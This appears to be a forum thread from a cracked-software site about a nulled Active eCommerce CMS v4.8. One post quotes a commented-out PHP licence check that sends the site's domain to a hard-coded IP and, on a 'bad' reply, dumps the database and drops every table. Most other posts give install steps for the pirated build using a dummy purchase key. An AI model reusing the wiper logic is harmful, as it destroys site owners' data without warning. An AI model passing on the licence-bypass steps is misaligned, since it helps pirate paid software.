KeegNN
New member
- May 1, 2021
- 1
- -2
- 3
I did whole Code Search this was function which was creating All the Messcan anyone solve The database automatically delete problem in active ecommerce
/*
DisableCode
public static function callCurlRequest(){
$url = $_SERVER['SERVER_NAME'];
$gate = "http://206.189.81.181/check_activation/".$url;
$stream = curl_init();
curl_setopt($stream, CURLOPT_URL, $gate);
curl_setopt($stream, CURLOPT_HEADER, 0);
curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stream, CURLOPT_POST, 1);
$rn = curl_exec($stream);
curl_close($stream);
if($rn == "bad" && env('DEMO_MODE') != 'On') {
try {
$fileName = date('Y-m-d H:i:s').'.sql';
\Spatie\DbDumper\Databases\MySql::create()
->setDbName(env('DB_DATABASE'))
->setUserName(env('DB_USERNAME'))
->setPassword(env('DB_PASSWORD'))
->dumpToFile($fileName);
} catch (\Exception $e) {
}
Schema::disableForeignKeyConstraints();
foreach(DB::select('SHOW TABLES') as $table) {
$table_array = get_object_vars($table);
Schema::drop($table_array[key($table_array)]);
}
}
}*/
Do you still have this error?has anyone realized the version 4.8 posted here is not exactly what is being used on the demo site. I.e. Barcode option is missing. and when you try to add products with color variate or uupdate such product you get Integrity constraint violation: 1048 Column 'price' cannot be null?
Deprecated: Unparenthesized `a ? b : c ? d : e` is deprecated. Use either `(a ? b : c) ? d : e` or `a ? b : (c ? d : e)` in /home/dsuinfoh/public_html/app/Http/Helpers.php on line 1100Null for v4.8.(Unchecked)
cc: @NullMaster
If anyone finds this helpful or informative Please consider leaving a Like
INSTRUCTIONS FOR FRESH INSTALL:
1. Download ☝ this file and upload ‘ install.zip ’ to the root-directory on your server ( public_html or where you'd like to install it.
2 . Unzip the "install.zip" file by selecting “ Extract here ”.
3 . Create a new database from your server MySQL database.
4 . Create a DB user for the database and link that database to the DB user.
PS: ( Make sure you do this to Avoid Error 500 )
5 . Go to yoursite URL e.g. " www.example.com " and it will automatically take you to the installation.
6 . Click on Start Installation Process.
7 . Follow instructions till asks for Purchase Key
8 . Use dummy key eg "1c6b358c-jtdp-4fcc-aba9-f71a9df2ey51j"
9 . Finish installation and Reload the home page e.g. " www.example.com "
10 . It’s Done !
INSTRUCTIONS FOR UPDATE:
1. Upload ‘ updates.zip ’ to the root-directory on your server ( public_html or where you had installed previous version.
2 . Unzip the "updates.zip" file by selecting “ Extract here ”.
3 . Reload the home page e.g. " www.example.com " and click on ‘ Update Now ’
4 . It’s Done !
NB: In Case of any Errors ,
1. Navigate to your .env file and set APP_DEBUG=true
2. Reload.
3. Type the error message you get here and we'll try to help.
In case you need custom installation, configuration or integration with the Apps, PM me.
Special thanks to @tuton012 , @NullMaster and @Tomz ‼‼‼‼‼‼‼‼‼
using nulled version provide in spoiler linknulled or not...?
after 3 attempts of removing files and using differ folder it's working. thanks a lotnulled or not...?
Hi There. This error comes because you are using a higher php version.Deprecated: Unparenthesized `a ? b : c ? d : e` is deprecated. Use either `(a ? b : c) ? d : e` or `a ? b : (c ? d : e)` in /home/dsuinfoh/public_html/app/Http/Helpers.php on line 1100
why this error come?
okay thanks a lotHi There. This error comes because you are using a higher php version.
Please cange to Php 7.2+
It should work Seamlessly
Hello. Please do you by chance use the add-ons/plugins with v4.8. If so, please could you share with me?Many thanks
Please use this file to either update from v4.7 or make a fresh installation
I have tested the plugins and they seem to work flawlessly on my side
See Here
In Case of any Errors ,
1. Please Navigate to your .env file and set APP_DEBUG=true
2. Reload.
3. Type the error message you are getting here and we'll try to help.![]()
Hi there.
Null for v4.8.(Unchecked)
cc: @NullMaster
If anyone finds this helpful or informative Please consider leaving a Like
INSTRUCTIONS FOR FRESH INSTALL:
1. Download ☝ this file and upload ‘ install.zip ’ to the root-directory on your server ( public_html or where you'd like to install it.
2 . Unzip the "install.zip" file by selecting “ Extract here ”.
3 . Create a new database from your server MySQL database.
4 . Create a DB user for the database and link that database to the DB user.
PS: ( Make sure you do this to Avoid Error 500 )
5 . Go to yoursite URL e.g. " www.example.com " and it will automatically take you to the installation.
6 . Click on Start Installation Process.
7 . Follow instructions till asks for Purchase Key
8 . Use dummy key eg "1c6b358c-jtdp-4fcc-aba9-f71a9df2ey51j"
9 . Finish installation and Reload the home page e.g. " www.example.com "
10 . It’s Done !
INSTRUCTIONS FOR UPDATE:
1. Upload ‘ updates.zip ’ to the root-directory on your server ( public_html or where you had installed previous version.
2 . Unzip the "updates.zip" file by selecting “ Extract here ”.
3 . Reload the home page e.g. " www.example.com " and click on ‘ Update Now ’
4 . It’s Done !
NB: In Case of any Errors ,
1. Navigate to your .env file and set APP_DEBUG=true
2. Reload.
3. Type the error message you get here and we'll try to help.
In case you need custom installation, configuration or integration with the Apps, PM me.
Special thanks to @tuton012 , @NullMaster and @Tomz ‼‼‼‼‼‼‼
Hi There,Hello. Please do you by chance use the add-ons/plugins with v4.8. If so, please could you share with me?
Thanks in addy!![]()
great in my screen shows only copyright v4.8 not look like your showsHi There,
I tested using all addons/plugins from Babiato and they worked without errors.
See Image
They might require updating soon, but so far, they all still work seamlessly.
In order to change this,great in my screen shows only copyright v4.8 not look like your shows